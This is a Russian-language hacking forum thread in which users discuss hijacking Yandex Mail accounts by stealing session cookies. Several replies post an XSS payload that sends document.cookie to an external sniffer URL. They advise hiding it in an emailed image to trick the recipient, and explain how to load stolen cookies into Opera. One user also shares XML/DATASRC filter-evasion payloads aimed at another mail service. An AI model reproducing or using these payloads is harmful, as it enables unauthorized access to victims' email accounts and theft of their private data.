Получил сессию с yandex и не знаю что с ней делат. Помогите.

IP=XX.XX.XX.Xx SITE=mail.yandex.ru
REFERER=http://mail.yandex.ru/msg?mesid=9000000000023702702&folder=9000010000001704418
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TISA)

Господа, что-то я запутался во всем этом.
Как получить с помощью этого доступ в ящик?

 

У тебя Query= пустая, в ней куки должны были прити. Так что это безполезная инфа.

 

Может и не правельно задам вопрос.
Но все же.
А что сделал не так. Присылаю письмо, его отткрываю, и снифф срабатыет. Сессию получил, а куки нет. Что я не так сделал.?

 

ты получил не сессию , а id письма и id папки

2) идентификация пользователя на яндексе идёт только через cookies

 

А ты описание к сниферу читал

HTML:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

 

В итоге:
Ты видимо не тот скрипт указал, к своему способу..
Читай описание hidden'a.
Чтобы впихнуть свои куки юзай "Оперу": Интсрументы - Настройки - Дополнительно - Cookies - Управление Cookies, дальше будет видно какие циферки на что заменять...

 

нет, просто он указал как гиперссылку, а не как картинку и .т.д хидден всё верно указал, тока это наверное не пройдёт. хех это не старые-добрые времена, думаю вы меня поняли

 

Есть способ через народ, я ему уже обьяснил, в пм.

 

Со сниффером не пройдёт? Да ну.. Зашифровать снифф, и кинуть, если ты про это говоришь.

 

Это уже обсуждалось, вобщем в код картинки вставляеш скрипт

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и отправляеш ее месте с письмом, ну и ждеш куков) если пользователь кот отправляеш полный лох и решит посмотреть твою фотку)​

 

др. почтовый севис - отличный от яндекса.
Ставлю в письме
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:alert('123')"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

пишет - 123

ставлю

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
)"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

и ставил просто ссылку, и кодировал в чар код, и редактировал все это, убираяя лишние пробелы. Результат - 0.
Вывод - нужно более экзоичным способом запостить туда скррипт со снифом, либо руки можно мне поломать.

Господа, отвечайте по существу.
С уважением!

 

Товариш а ты не думал что тама не лохи сидят и тама фильтры стоят?)